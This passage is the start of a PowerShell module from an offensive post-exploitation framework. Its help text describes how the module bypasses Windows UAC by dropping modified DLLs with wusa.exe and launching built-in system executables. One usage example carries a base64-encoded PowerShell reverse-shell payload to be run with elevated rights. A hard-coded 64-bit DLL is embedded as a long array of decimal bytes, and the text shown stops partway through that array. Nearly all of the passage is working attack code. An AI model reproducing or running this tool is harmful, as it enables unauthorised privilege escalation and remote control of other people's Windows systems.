PoshC2_Python/Modules/Invoke-PsUACme.ps1

418 lines
50 KiB
PowerShell

function Invoke-PsUACme
{
<#
.SYNOPSIS
Nishang script which uses known methods to bypass UAC.
.DESCRIPTION
This script implements methods from UACME project (https://github.com/hfiref0x/UACME) to bypass UAC on Windows machines.
It drops DLLs in the known misconfigured/vulnerable locations of Windows machines using Wusa.exe and executes built-in executables
to bypass UAC. Following methods (named mostly on the basis of executables used) are implemented: "sysprep","oobe","ActionQueue",
"migwiz","cliconfg","winsat" and "mmc"
The DLLs dropped by the script is a modified version of Fubuki from the UACME project. It needs separate DLLs for 64 bit and 32 bit machines.
It is able to determine the bit-ness of the process from which it is called and uses the apt DLL.
The script drops cmd.bat in the C:\Windows\Temp directory and it is this batch file which is called from the DLL. Everything provided
to the Payload parameter ends up in this batch file.
Wusa.exe on Windows 10 has not "extract" option. Therefore, Invoke-PsUACme does not work on Windows 10 currently.
A clean up is done by the script after payload execution. But the DLLs dropped in secure locations must be removed manually.
The script must be run from a process running with medium integrity.
.PARAMETER Payload
Payload to be executed from the elevated process. Default one checks of the elevation was successful.
.PARAMETER method
The method to be used for elevation. Defaut one is sysprep.
.PARAMETER PayloadPath
The path to the payload. The default one is C:\Windows\temp\cmd.bat. To change this, change the path in DLL as well.
.PARAMETER CustomDLL64
Path to a custom 64 bit DLL.
.PARAMETER CustomDLL32
Path to a custom 32 bit DLL.
.PARAMETER $DllBytes64
Default 64 bit DLL hard coded in the script. It is slightly modified Fubuki DLL from the UACME project.
.PARAMETER $DllBytesew
Default 32 bit DLL hard coded in the script. It is slightly modified Fubuki DLL from the UACME project.
.EXAMPLE
PS > Invoke-PsUACme -Verbose
Above command runs the sysprep method and the default payload.
.EXAMPLE
PS > Invoke-PsUACme -method oobe -Verbose
Above command runs the oobe method and the default payload.
.EXAMPLE
PS > Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVABaAEYAZABhADgASQB3AEYASQBiAHYAQgAvAHMAUABoADkASwBOAGgATgBuAFEAMQBnADgAMgB5ADQAUwB0AGIAQwBJAE0AbABWAFgAWQBoAFgAZwBSADIANABQAHQAcgBGAFgAcwBFAFIAWAAxAHYAeQA5AHAAYgBlAGQAVgBEAHUASAA5AGUARQA1AGkAaABtAG0AQwBHAGMARQByAEQASABGAHYAagBlAGEALwBHAEIASQBFAHgANQB4AHcASgBZAFoASQBJAGwAaQBIAFMANgBSAGMAVABQAHkAeABYAHkAaQBaADQAYgB5ADQAdwB1AGsAOABDADcAZABwAEMAOABkAG8AdABGAHAATgA3AHAAawA1AGIAVgBHAHUAVgBJAHgAWgBCAG8AbwArAFUAbABEAGMATQBlADUATgA1ADAAZgBDADYAVwB4AG0ANgBqAE4AWABJAGwAdQBJAFQAcgB2AGQAYgBKADgAZgBUAHYAYgBGADIAOABkAEoAaQBvAHkAWgBpAGIAYQBYAFEAZQBJAGIAWgBjAFIASwBmAFEAUABzAEIAcABTAGoAKwBNAEoAcwBRAFQASABuAFkARwBVAEkATgBqADkANQBaAGkAUgBKAEsAaAArADcAdwBiAGMAbQB4AHcAMABPADUAUQBxAHIAUgBTAFoANABJAFAARQBXACsASQBQAEIAUgB4AGEAdQBvAHkAUgBiADgAQwB1AGYARwBxAHMAVwBYAFoATABvAFQAVABDAEwANQBqAEoAYwA2AHQAQQBFAEQAMQBBADIAdQBMADEASABCADgANAB3ADIAcABGAFYAMgB1AEIARwA2AGsASgBCAFgAaABtAGYAdwBCAGcASABZAEsAaQBUAGIAZgBZAFIARgAyAE4ASgBzAGIANwBzAGcAWABIADEAcQBFAEkAZABQAHkAVQBOAGgAbABlAG0AVwBiAGQAYgBNAEIAWgBzADcANQBxAEoALwBUAGYAVQBUAHkAeAArAHQAZwBrAGgAcQAzAE0AVQBkAHoAMQBYAHoAMQBOAHIAUAA5AE4AZABIAGoATgArADgAYQBwAGYAOABkAE4AMQBqAG8AegBmADMALwAwAEIAJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA=="
Above command runs the oobe method and the specified payload. The payload in this case is the one liner PowerShell reverse shell
(Shells directory of Nishang) which is base64 encoded using the Invoke-Encode (with the -OutCommand parameter) script from the
Utility directory of Nishang.
The reverse shell in above case runs with elevated privileges.
.LINK
http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[String]
$Payload = 'powershell.exe -noexit -c "if ([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match ''S-1-5-32-544'')) {Write-Output ''You have elevated/Administrator rights!''}"',
[Parameter(Position = 1, Mandatory = $False)]
[ValidateSet("sysprep","oobe","ActionQueue","migwiz","cliconfg","winsat","mmc")]
[String]
$method = "sysprep",
[Parameter(Position = 2, Mandatory = $False)]
[String]
$PayloadPath = "C:\Windows\temp\cmd.bat",
[Parameter(Position = 3, Mandatory = $False)]
[String]
$CustomDll64,
[Parameter(Position = 4, Mandatory = $False)]
[String]
$CustomDll32,
[Parameter(Position = 5, Mandatory = $False)]
[String]
$DllBytes64 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 232 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 53 114 7 185 113 19 105 234 113 19 105 234 113 19 105 234 172 236 162 234 116 19 105 234 113 19 104 234 124 19 105 234 131 74 97 235 123 19 105 234 131 74 105 235 112 19 105 234 131 74 150 234 112 19 105 234 113 19 254 234 112 19 105 234 131 74 107 235 112 19 105 234 82 105 99 104 113 19 105 234 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 100 134 4 0 250 130 9 86 0 0 0 0 0 0 0 0 240 0 34 32 11 2 14 0 0 4 0 0 0 16 0 0 0 0 0 0 168 17 0 0 0 16 0 0 0 0 0 128 1 0 0 0 0 16 0 0 0 2 0 0 6 0 0 0 6 0 0 0 6 0 0 0 0 0 0 0 0 80 0 0 0 4 0 0 19 147 0 0 2 0 96 1 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 16 0 0 0 176 34 0 0 148 3 0 0 68 38 0 0 60 0 0 0 0 64 0 0 224 4 0 0 0 48 0 0 24 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 33 0 0 56 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 120 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 52 3 0 0 0 16 0 0 0 4 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 242 7 0 0 0 32 0 0 0 8 0 0 0 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 112 100 97 116 97 0 0 24 0 0 0 0 48 0 0 0 2 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 4 0 0 0 64 0 0 0 6 0 0 0 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 194 0 0 204 72 137 92 36 24 85 86 87 72 141 108 36 185 72 129 236 224 0 0 0 51 246 72 141 69 111 72 33 117 111 72 141 21 87 16 0 0 33 117 103 65 185 25 0 2 0 69 51 192 72 137 68 36 32 72 199 193 1 0 0 128 255 21 193 15 0 0 133 192 15 133 67 1 0 0 72 139 77 111 72 133 201 15 132 54 1 0 0 72 141 69 103 69 51 201 72 137 68 36 40 72 141 21 49 16 0 0 72 33 116 36 32 69 51 192 255 21 147 15 0 0 133 192 15 133 13 1 0 0 139 125 103 255 199 255 21 208 15 0 0 68 139 199 141 86 8 72 139 200 255 21 137 15 0 0 72 139 216 72 133 192 15 132 231 0 0 0 72 139 77 111 72 141 69 103 72 137 68 36 40 72 141 21 225 15 0 0 69 51 201 72 137 92 36 32 69 51 192 255 21 64 15 0 0 133 192 15 133 136 0 0 0 72 141 13 217 15 0 0 255 21 99 15 0 0 72 139 203 255 21 90 15 0 0 141 86 104 51 192 139 202 72 141 125 215 243 170 72 141 125 183 137 85 215 141 78 24 243 170 72 141 77 215 255 21 87 15 0 0 72 141 69 183 69 51 201 72 137 68 36 72 69 51 192 72 141 69 215 72 139 211 72 137 68 36 64 51 201 72 33 116 36 56 72 33 116 36 48 33 116 36 40 33 116 36 32 255 21 250 14 0 0 139 240 133 192 116 20 72 139 77 183 255 21 226 14 0 0 72 139 77 191 255 21 216 14 0 0 255 21 250 14 0 0 76 139 195 51 210 72 139 200 255 21 228 14 0 0 72 139 77 111 255 21 154 14 0 0 72 141 21 251 14 0 0 72 199 193 1 0 0 128 255 21 110 14 0 0 139 198 72 139 156 36 16 1 0 0 72 129 196 224 0 0 0 95 94 93 195 204 72 137 92 36 8 72 137 124 36 16 85 72 141 172 36 0 250 255 255 72 129 236 0 7 0 0 184 1 0 0 0 59 208 15 133 80 1 0 0 72 141 13 10 15 0 0 255 21 108 14 0 0 232 35 254 255 255 51 219 133 192 15 133 43 1 0 0 141 83 104 139 202 72 141 124 36 112 243 170 72 141 124 36 80 137 84 36 112 141 75 24 243 170 72 141 76 36 112 255 21 88 14 0 0 51 192 72 141 125 224 185 10 2 0 0 72 141 85 224 243 170 72 141 13 240 14 0 0 65 184 4 1 0 0 255 21 28 14 0 0 255 200 61 2 1 0 0 15 135 213 0 0 0 51 192 72 141 189 240 1 0 0 185 16 4 0 0 243 170 15 183 77 224 72 141 133 240 1 0 0 102 133 201 116 30 72 141 85 224 72 141 189 240 1 0 0 72 43 215 102 137 8 72 131 192 2 15 183 12 2 102 133 201 117 240 102 137 24 72 141 133 240 1 0 0 102 57 157 240 1 0 0 116 9 72 131 192 2 102 57 24 117 247 72 141 13 158 14 0 0 186 99 0 0 0 72 43 200 102 137 16 72 141 64 2 15 183 20 1 102 133 210 117 240 102 137 24 72 141 141 240 1 0 0 72 141 68 36 80 69 51 201 72 137 68 36 72 69 51 192 72 141 68 36 112 51 210 72 137 68 36 64 72 141 69 224 72 137 68 36 56 72 137 92 36 48 137 92 36 40 137 92 36 32 255 21 68 13 0 0 133 192 116 22 72 139 76 36 80 255 21 45 13 0 0 72 139 76 36 88 255 21 34 13 0 0 51 201 255 21 18 13 0 0 204 76 141 156 36 0 7 0 0 73 139 91 16 73 139 123 24 73 139 227 93 195 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 39 0 0 0 0 0 0 182 39 0 0 0 0 0 0 162 39 0 0 0 0 0 0 214 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 86 39 0 0 0 0 0 0 98 39 0 0 0 0 0 0 72 39 0 0 0 0 0 0 130 39 0 0 0 0 0 0 50 39 0 0 0 0 0 0 22 39 0 0 0 0 0 0 10 39 0 0 0 0 0 0 112 39 0 0 0 0 0 0 248 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 83 0 111 0 102 0 116 0 119 0 97 0 114 0 101 0 92 0 65 0 107 0 97 0 103 0 105 0 0 0 0 0 76 0 111 0 118 0 101 0 76 0 101 0 116 0 116 0 101 0 114 0 0 0 0 0 65 0 107 0 97 0 103 0 105 0 32 0 108 0 101 0 116 0 116 0 101 0 114 0 32 0 102 0 111 0 117 0 110 0 100 0 0 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 32 0 97 0 116 0 32 0 121 0 111 0 117 0 114 0 32 0 115 0 101 0 114 0 118 0 105 0 99 0 101 0 46 0 13 0 10 0 0 0 0 0 0 0 37 0 115 0 121 0 115 0 116 0 101 0 109 0 114 0 111 0 111 0 116 0 37 0 92 0 116 0 101 0 109 0 112 0 92 0 0 0 0 0 99 0 109 0 100 0 46 0 98 0 97 0 116 0 0 0 0 0 0 0 250 130 9 86 0 0 0 0 13 0 0 0 252 0 0 0 136 33 0 0 136 9 0 0 0 0 0 0 250 130 9 86 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 71 67 84 76 0 16 0 0 52 3 0 0 46 116 101 120 116 36 109 110 0 0 0 0 0 32 0 0 120 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 128 32 0 0 8 1 0 0 46 114 100 97 116 97 0 0 136 33 0 0 252 0 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 132 34 0 0 40 0 0 0 46 120 100 97 116 97 0 0 176 34 0 0 148 3 0 0 46 101 100 97 116 97 0 0 68 38 0 0 40 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 108 38 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 128 38 0 0 120 0 0 0 46 105 100 97 116 97 36 52 0 0 0 0 248 38 0 0 250 0 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 24 0 0 0 46 112 100 97 116 97 0 0 0 64 0 0 160 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 160 64 0 0 64 4 0 0 46 114 115 114 99 36 48 50 0 0 0 0 1 20 7 0 20 52 34 0 20 1 28 0 8 112 7 96 6 80 0 0 1 26 7 0 26 116 227 0 26 52 226 0 26 1 224 0 11 80 0 0 0 0 0 0 0 0 0 0 250 130 9 86 0 0 0 0 240 35 0 0 1 0 0 0 28 0 0 0 28 0 0 0 216 34 0 0 72 35 0 0 184 35 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 253 35 0 0 20 36 0 0 42 36 0 0 52 36 0 0 62 36 0 0 89 36 0 0 117 36 0 0 144 36 0 0 163 36 0 0 184 36 0 0 202 36 0 0 222 36 0 0 243 36 0 0 15 37 0 0 34 37 0 0 58 37 0 0 77 37 0 0 104 37 0 0 124 37 0 0 145 37 0 0 172 37 0 0 198 37 0 0 210 37 0 0 232 37 0 0 246 37 0 0 17 38 0 0 35 38 0 0 55 38 0 0 0 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 8 0 9 0 10 0 11 0 12 0 13 0 14 0 15 0 16 0 17 0 18 0 19 0 20 0 21 0 22 0 23 0 24 0 25 0 26 0 27 0 70 117 98 117 107 105 54 52 46 100 108 108 0 67 97 108 108 78 116 80 111 119 101 114 73 110 102 111 114 109 97 116 105 111 110 0 67 111 110 115 116 114 117 99 116 80 97 114 116 105 97 108 77 115 103 86 87 0 67 114 101 97 116 101 85 114 105 0 67 117 114 114 101 110 116 73 80 0 68 101 118 79 98 106 67 114 101 97 116 101 68 101 118 105 99 101 73 110 102 111 76 105 115 116 0 68 101 118 79 98 106 68 101 115 116 114 111 121 68 101 118 105 99 101 73 110 102 111 76 105 115 116 0 68 101 118 79 98 106 69 110 117 109 68 101 118 105 99 101 73 110 116 101 114 102 97 99 101 115 0 68 101 118 79 98 106 71 101 116 67 108 97 115 115 68 101 118 115 0 68 101 118 79 98 106 79 112 101 110 68 101 118 105 99 101 73 110 102 111 0 68 108 108 82 101 103 105 115 116 101 114 83 101 114 118 101 114 0 71 101 110 101 114 97 116 101 65 99 116 105 111 110 81 117 101 117 101 0 80 111 119 101 114 71 101 116 65 99 116 105 118 101 83 99 104 101 109 101 0 80 114 105 118 97 116 101 67 111 73 110 116 101 114 110 101 116 67 111 109 98 105 110 101 85 114 105 0 80 114 111 99 101 115 115 65 99 116 105 111 110 81 117 101 117 101 0 83 76 71 101 116 87 105 110 100 111 119 115 73 110 102 111 114 109 97 116 105 111 110 0 87 100 115 65 98 111 114 116 66 108 97 99 107 98 111 97 114 100 0 87 100 115 65 98 111 114 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 69 110 117 109 0 87 100 115 67 114 101 97 116 101 66 108 97 99 107 98 111 97 114 100 0 87 100 115 68 101 115 116 114 111 121 66 108 97 99 107 98 111 97 114 100 0 87 100 115 69 110 117 109 70 105 114 115 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 0 87 100 115 69 110 117 109 78 101 120 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 0 87 100 115 70 114 101 101 68 97 116 97 0 87 100 115 71 101 116 66 108 97 99 107 98 111 97 114 100 86 97 108 117 101 0 87 100 115 73 110 105 116 105 97 108 105 122 101 0 87 100 115 73 115 68 105 97 103 110 111 115 116 105 99 77 111 100 101 69 110 97 98 108 101 100 0 87 100 115 83 101 116 65 115 115 101 114 116 70 108 97 103 115 0 87 100 115 83 101 116 117 112 76 111 103 77 101 115 115 97 103 101 87 0 87 100 115 84 101 114 109 105 110 97 116 101 0 168 38 0 0 0 0 0 0 0 0 0 0 148 39 0 0 40 32 0 0 128 38 0 0 0 0 0 0 0 0 0 0 228 39 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 39 0 0 0 0 0 0 182 39 0 0 0 0 0 0 162 39 0 0 0 0 0 0 214 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 86 39 0 0 0 0 0 0 98 39 0 0 0 0 0 0 72 39 0 0 0 0 0 0 130 39 0 0 0 0 0 0 50 39 0 0 0 0 0 0 22 39 0 0 0 0 0 0 10 39 0 0 0 0 0 0 112 39 0 0 0 0 0 0 248 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 197 2 71 101 116 83 116 97 114 116 117 112 73 110 102 111 87 0 60 3 72 101 97 112 70 114 101 101 0 0 91 1 69 120 112 97 110 100 69 110 118 105 114 111 110 109 101 110 116 83 116 114 105 110 103 115 87 0 253 3 79 117 116 112 117 116 68 101 98 117 103 83 116 114 105 110 103 87 0 0 127 0 67 108 111 115 101 72 97 110 100 108 101 0 56 3 72 101 97 112 65 108 108 111 99 0 87 1 69 120 105 116 80 114 111 99 101 115 115 0 169 2 71 101 116 80 114 111 99 101 115 115 72 101 97 112 0 0 219 0 67 114 101 97 116 101 80 114 111 99 101 115 115 87 0 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 146 2 82 101 103 81 117 101 114 121 86 97 108 117 101 69 120 87 0 0 133 2 82 101 103 79 112 101 110 75 101 121 69 120 87 0 104 2 82 101 103 68 101 108 101 116 101 75 101 121 87 0 84 2 82 101 103 67 108 111 115 101 75 101 121 0 65 68 86 65 80 73 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 16 0 0 167 17 0 0 132 34 0 0 168 17 0 0 52 19 0 0 152 34 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 16 0 0 0 32 0 0 128 24 0 0 0 56 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 80 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 104 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 144 0 0 0 160 64 0 0 192 2 0 0 0 0 0 0 0 0 0 0 96 67 0 0 125 1 0 0 0 0 0 0 0 0 0 0 192 2 52 0 0 0 86 0 83 0 95 0 86 0 69 0 82 0 83 0 73 0 79 0 78 0 95 0 73 0 78 0 70 0 79 0 0 0 0 0 189 4 239 254 0 0 1 0 9 0 1 0 0 0 0 0 9 0 1 0 0 0 0 0 63 0 0 0 0 0 0 0 0 0 4 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 2 0 0 1 0 83 0 116 0 114 0 105 0 110 0 103 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 252 1 0 0 1 0 48 0 52 0 48 0 57 0 48 0 52 0 98 0 48 0 0 0 50 0 9 0 1 0 67 0 111 0 109 0 112 0 97 0 110 0 121 0 78 0 97 0 109 0 101 0 0 0 0 0 85 0 71 0 32 0 78 0 111 0 114 0 116 0 104 0 0 0 0 0 72 0 16 0 1 0 70 0 105 0 108 0 101 0 68 0 101 0 115 0 99 0 114 0 105 0 112 0 116 0 105 0 111 0 110 0 0 0 0 0 85 0 65 0 67 0 77 0 101 0 32 0 112 0 114 0 111 0 120 0 121 0 32 0 68 0 76 0 76 0 0 0 48 0 8 0 1 0 70 0 105 0 108 0 101 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 0 0 49 0 46 0 57 0 46 0 48 0 46 0 48 0 0 0 46 0 7 0 1 0 73 0 110 0 116 0 101 0 114 0 110 0 97 0 108 0 78 0 97 0 109 0 101 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 0 0 0 0 104 0 34 0 1 0 76 0 101 0 103 0 97 0 108 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 0 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 32 0 40 0 67 0 41 0 32 0 50 0 48 0 49 0 52 0 32 0 45 0 50 0 48 0 49 0 53 0 32 0 85 0 71 0 32 0 78 0 111 0 114 0 116 0 104 0 0 0 62 0 11 0 1 0 79 0 114 0 105 0 103 0 105 0 110 0 97 0 108 0 70 0 105 0 108 0 101 0 110 0 97 0 109 0 101 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 46 0 100 0 108 0 108 0 0 0 0 0 44 0 6 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 78 0 97 0 109 0 101 0 0 0 0 0 85 0 65 0 67 0 77 0 101 0 0 0 52 0 8 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 49 0 46 0 57 0 46 0 48 0 46 0 48 0 0 0 68 0 0 0 1 0 86 0 97 0 114 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 0 0 36 0 4 0 0 0 84 0 114 0 97 0 110 0 115 0 108 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 9 4 176 4 60 63 120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 